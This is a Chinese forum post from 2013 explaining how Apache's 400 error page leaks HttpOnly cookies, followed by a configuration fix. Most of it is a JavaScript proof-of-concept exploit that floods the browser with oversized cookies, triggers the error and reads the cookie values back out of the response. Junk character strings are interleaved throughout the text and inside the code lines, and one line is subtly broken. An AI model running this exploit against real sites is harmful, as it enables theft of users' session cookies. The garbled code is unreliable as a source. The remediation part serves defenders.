很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
' m4 f" Y; k: ]% v
% M9 f- S1 ~9 N) @2 z: N' S用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:; b7 D* s1 w8 a. W
# M/ C* e2 F9 a0 \/ H6 }% v4 u
" s# Z& D v( x7 c: `0 O
// http://www.exploit-db.com/exploits/18442/
: g7 l5 f4 u9 L2 n& I$ Xfunction setCookies (good) {
0 J8 E* u& |& F2 T; u Y3 ~// Construct string for cookie value: o% ^& W& S( W' Y' I
var str = "";
# `: B R' X5 `; i+ P: Jfor (var i=0; i< 819; i++) {' ^! ]9 F7 Q& W+ J, }/ k/ ^
str += "x";
, ~0 U2 `( v; u( S}
' p, a( B" M3 b. f2 L* c! f& g// Set cookies g! Q- H# @% l9 E7 o1 c( G" h- E- t$ R
for (i = 0; i < 10; i++) {% W) r9 M! s! W% H. n# V
// Expire evil cookie
# n3 d; t" m: s, y2 x' C! g# dif (good) {
6 i3 c9 J: W5 @9 `var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";% N3 j0 j' }5 K; y6 `; z% K
}
- E' q! O! n# Y5 H$ [- x6 V// Set evil cookie8 f+ D0 [. H6 O, k
else {: ]/ F1 _1 g, s2 b# ^7 Z
var cookie = "xss"+i+"="+str+";path=/";
+ v2 G3 u; A. X, e! m/ u}
/ E1 C4 z, w+ Z* Ddocument.cookie = cookie;
# B7 G+ \# x8 J$ v9 t7 S; h}3 _; H1 M4 Z, B' B
}
- K _9 L8 R) z! |function makeRequest() {' F! ]! l( ?, ^+ Y: H2 G
setCookies();0 s) f" g: R9 p( w8 w- f
function parseCookies () {
; \* @+ P8 `) E$ x3 O" Ivar cookie_dict = {};# l) c5 C+ w, V
// Only react on 400 status5 k0 B2 K3 `0 Z6 L- H, X8 V
if (xhr.readyState === 4 && xhr.status === 400) {8 n. F: I2 j9 }+ [1 g* t) h
// Replace newlines and match <pre> content8 E# t/ b: d; {) r7 ?( [4 V8 u
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
% f* V) `' `( S! Y$ w/ ?: Pif (content.length) {
5 }) C" R9 A; e1 D# z- x2 L' L) T. ~// Remove Cookie: prefix
4 S" e& }, F8 Q( N$ Scontent = content[1].replace("Cookie: ", "");
( \- I \& j6 O; A5 gvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
1 e! j% Q d( S0 B2 c4 P* ^7 J) Y4 A// Add cookies to object
3 \! T- k# }# ~8 J2 W5 [for (var i=0; i<cookies.length; i++) {
$ O: H4 ^) Z4 c# ?6 a3 `( p* w5 n$ Nvar s_c = cookies.split('=',2);# b9 e9 W+ _# Z7 S6 Z
cookie_dict[s_c[0]] = s_c[1];) z0 V+ j: z( w" s5 P1 k* s0 f1 M
}
! [. B" p! M, r! C}
! z+ M+ n1 G* V8 s7 W$ t) x// Unset malicious cookies
! S% u& C' h$ i& K. t9 dsetCookies(true);4 ?* x3 H2 i$ F% H6 k1 g4 w; X
alert(JSON.stringify(cookie_dict));
. T& `* [! s4 @2 ]2 ]8 a}
6 f; \' U1 ?* [- W% }}# Q# S. z% W" ?% v# w
// Make XHR request7 j2 P# \3 E" b' T
var xhr = new XMLHttpRequest();# s$ N; P6 h' S. ^7 S/ u+ h
xhr.onreadystatechange = parseCookies;
! ]" D2 j k5 \( C5 k& I9 n7 z) s9 t Cxhr.open("GET", "/", true);+ B, ]9 k% s- V E8 B% N" m" O" k! {
xhr.send(null);
) ~9 R( E) C& T. A4 m}6 D7 E5 A2 E' |7 v9 F+ t1 N( [9 r
makeRequest();
+ f; n& M! i# ^: T5 J9 ]1 ~& |* g( g. R; e" R% {6 i9 d
你就能看见华丽丽的400错误包含着cookie信息。
! E. }1 J: t- O) u- x7 W4 W' g1 ~( i1 T8 B3 y) X: n! {
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#' Q" R* Q& P6 v* Y! `
8 \5 k% a. k7 {$ _
修复方案:
. X6 }8 V- d$ L" D/ i+ _# O9 ]0 |& ?- N! F3 a1 W
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下# J: ^6 D- D9 d; W, Z5 E) S4 t9 V
' g9 B0 W" {% C e( pIn the event of a problem or error, Apachecan be configured to do one of four things,1 V& ?0 P. ^! U0 A7 S( s
. G+ u( ?) `1 \( @3 W5 ^5 U1. output asimple hardcoded error message输出一个简单生硬的错误代码信息8 i, K/ F+ D1 M: \! L2 M* ^+ Q
2. output acustomized message输出一段信息" b. s% R @3 S
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
! v1 S6 n( c, G6 ^) G4. redirect to an external URL to handle theproblem/error转向一个外部URL5 m2 q9 W, e0 G0 s2 x4 L
3 O" u( G5 R1 a; }2 `
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容9 ~( o, {; \0 {
0 o# {' ~, i& |' \7 n
Apache配置:
e% c2 T; B8 |" h6 ~& z H: y- n1 S9 ^$ f
ErrorDocument400 " security test"
6 K' j' J9 t6 d9 j$ I' [( Z5 y9 O6 d5 c a5 k `
当然,升级apache到最新也可:)。
! g& [% v* m7 d+ P, P3 d
; S+ ^; w& w* h6 g1 I参考:http://httpd.apache.org/security/vulnerabilities_22.html0 U2 Z! s- D& B+ |# T; f( z' l
6 x7 K6 E) H) w" l# y2 r) P& i |
发表于 2013-4-19 19:15:43
收藏
支持
反对